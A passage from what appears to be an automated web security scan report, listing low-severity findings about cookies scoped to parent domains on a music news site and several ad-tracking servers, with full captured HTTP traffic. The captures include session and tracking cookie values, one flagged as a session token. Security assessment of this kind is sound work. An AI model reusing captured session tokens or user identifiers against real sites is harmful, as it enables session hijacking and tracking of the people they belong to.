"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...

9.4. http://www.nme.com/news/sufjan-stevens/56527

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...

9.5. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2931142961646634775 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; s=1,2*4dab79ba*48Tp2my9Nk*5pS60fYTxp8svLzyNVfDVhLzEw==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*UMOtU6T9f3*5oBTqxB3t3jlHiD_vqydkrPvYQ==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

9.6. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=12 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwS
KXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; 
pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15104%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:02 GMT
Content-Length: 336

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2819581112640559492&fpid=12&nu=n&t
...[SNIP]...

9.7. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:15 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

9.8. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=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; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=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; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

9.9. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
